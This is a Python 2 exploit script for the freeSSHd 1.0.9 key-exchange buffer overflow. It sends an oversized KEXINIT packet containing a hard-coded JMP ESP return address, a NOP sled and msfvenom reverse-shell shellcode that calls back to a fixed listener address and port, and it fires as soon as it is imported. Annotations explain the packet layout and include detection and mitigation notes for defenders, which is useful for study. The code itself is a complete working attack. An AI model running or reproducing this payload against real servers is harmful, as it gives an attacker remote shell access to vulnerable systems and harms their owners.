#!/usr/bin/env python
import socket,sys,time
#How To Use: ./exploit.py [target]
def connection():
    """Open a TCP connection to port 22 on the host given as argv[1].

    The socket is published through the module-level global ``s`` so that
    exploit() can write to it; the first 1024 bytes the server returns (its
    identification banner) are printed. Python 2 print statement.
    """
    global s
    target = (sys.argv[1], 22)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(target)
    banner = s.recv(1024)
    print banner
def exploit():
    """Send one oversized SSH key-exchange message to the target, then exit.

    Python 2 only: the print statement is used, and the string literals below
    are byte strings that go straight onto the socket.

    What goes on the wire (one s.send at the end):
      header_start - decodes to the client identification line
                     "SSH-1.99-OpenSSH_3.4\\n" followed by the start of a
                     binary packet: 4-byte packet length, 1-byte padding
                     length, message type 0x14 (20, the SSH_MSG_KEXINIT code
                     of RFC 4253), 16 zero cookie bytes and a name-list length
                     of 0x07de (2014). That layout is consistent with the
                     filename's "KeyExchangeAlgorithm": the kex_algorithms
                     name-list is declared far longer than any legitimate
                     comma-separated algorithm list.
      junk         - 1055 'A' bytes filling that name-list.
      eip          - a 4-byte hard-coded address (per the comment, JMP ESP in
                     SHELL32.dll), so the payload depends on that module
                     loading at a fixed address; ASLR on the module would
                     break it.
      nop          - 100 NOP bytes.
      buf          - the msfvenom-generated reverse-shell payload described by
                     the comment above it.
      padding      - 'C' bytes; the count only subtracts header_start, junk
                     and eip, so the message is longer than 22000 bytes by
                     len(nop) + len(buf) + 2 (the trailing "\\r\\n").

    Defender notes: the observable artifact is a client that, right after the
    banner, sends a KEXINIT whose algorithm name-list is ~2 KB of non-name
    bytes and a single request of more than 22000 bytes. Normal name-lists
    are short ASCII identifiers, so a length/charset check on name-lists at
    the server or on an inline sensor distinguishes this from real clients.
    The mitigation is retiring the vulnerable freeSSHd build (1.0.9 per the
    filename); the server's reply, if any, is printed but not interpreted.
    """
    connection()
    # Identification line + start of a KEXINIT packet, see docstring.
    header_start = "\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48" \
    "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00" \
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"
    junk = 1055 * '\x41'
    # Hard-coded, non-randomised address: little-endian form of the value in the comment.
    eip = '\x3F\x9E\xB7\x7C' #JMP ESP SHELL32.dll 7CB79E3F
    nop = 100 * '\x90'
    #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.127.129 LPORT=1453 -b '\x00' -f py
    buf = ""
    buf += "\xdb\xc5\xd9\x74\x24\xf4\xba\xf2\x1c\x60\xa4\x58\x33"
    buf += "\xc9\xb1\x52\x31\x50\x17\x03\x50\x17\x83\x32\x18\x82"
    buf += "\x51\x4e\xc9\xc0\x9a\xae\x0a\xa5\x13\x4b\x3b\xe5\x40"
    buf += "\x18\x6c\xd5\x03\x4c\x81\x9e\x46\x64\x12\xd2\x4e\x8b"
    buf += "\x93\x59\xa9\xa2\x24\xf1\x89\xa5\xa6\x08\xde\x05\x96"
    buf += "\xc2\x13\x44\xdf\x3f\xd9\x14\x88\x34\x4c\x88\xbd\x01"
    buf += "\x4d\x23\x8d\x84\xd5\xd0\x46\xa6\xf4\x47\xdc\xf1\xd6"
    buf += "\x66\x31\x8a\x5e\x70\x56\xb7\x29\x0b\xac\x43\xa8\xdd"
    buf += "\xfc\xac\x07\x20\x31\x5f\x59\x65\xf6\x80\x2c\x9f\x04"
    buf += "\x3c\x37\x64\x76\x9a\xb2\x7e\xd0\x69\x64\x5a\xe0\xbe"
    buf += "\xf3\x29\xee\x0b\x77\x75\xf3\x8a\x54\x0e\x0f\x06\x5b"
    buf += "\xc0\x99\x5c\x78\xc4\xc2\x07\xe1\x5d\xaf\xe6\x1e\xbd"
    buf += "\x10\x56\xbb\xb6\xbd\x83\xb6\x95\xa9\x60\xfb\x25\x2a"
    buf += "\xef\x8c\x56\x18\xb0\x26\xf0\x10\x39\xe1\x07\x56\x10"
    buf += "\x55\x97\xa9\x9b\xa6\xbe\x6d\xcf\xf6\xa8\x44\x70\x9d"
    buf += "\x28\x68\xa5\x32\x78\xc6\x16\xf3\x28\xa6\xc6\x9b\x22"
    buf += "\x29\x38\xbb\x4d\xe3\x51\x56\xb4\x64\x9e\x0f\xc9\xf5"
    buf += "\x76\x52\x35\xf3\x2b\xdb\xd3\x91\x23\x8a\x4c\x0e\xdd"
    buf += "\x97\x06\xaf\x22\x02\x63\xef\xa9\xa1\x94\xbe\x59\xcf"
    buf += "\x86\x57\xaa\x9a\xf4\xfe\xb5\x30\x90\x9d\x24\xdf\x60"
    buf += "\xeb\x54\x48\x37\xbc\xab\x81\xdd\x50\x95\x3b\xc3\xa8"
    buf += "\x43\x03\x47\x77\xb0\x8a\x46\xfa\x8c\xa8\x58\xc2\x0d"
    buf += "\xf5\x0c\x9a\x5b\xa3\xfa\x5c\x32\x05\x54\x37\xe9\xcf"
    buf += "\x30\xce\xc1\xcf\x46\xcf\x0f\xa6\xa6\x7e\xe6\xff\xd9"
    buf += "\x4f\x6e\x08\xa2\xad\x0e\xf7\x79\x76\x3e\xb2\x23\xdf"
    buf += "\xd7\x1b\xb6\x5d\xba\x9b\x6d\xa1\xc3\x1f\x87\x5a\x30"
    buf += "\x3f\xe2\x5f\x7c\x87\x1f\x12\xed\x62\x1f\x81\x0e\xa7"
    # The 'C' count ignores nop and buf, so the total exceeds 22000 bytes
    # (leftover "fuzzer" naming from an earlier stage of the script).
    fuzzer = header_start + junk + eip + nop + buf + (22000 -(len(header_start) + len(junk) + len(eip)))*'\x43' + '\r\n'
    s.send(fuzzer)
    # Whatever the server answers (or an empty string on close) is printed as-is.
    print s.recv(1024)
    time.sleep(10)
    s.close()
    print "\n Exploit Completed :) \n"
# Runs unconditionally at import time: there is no __main__ guard, so merely
# importing this module opens the connection and sends the message.
exploit()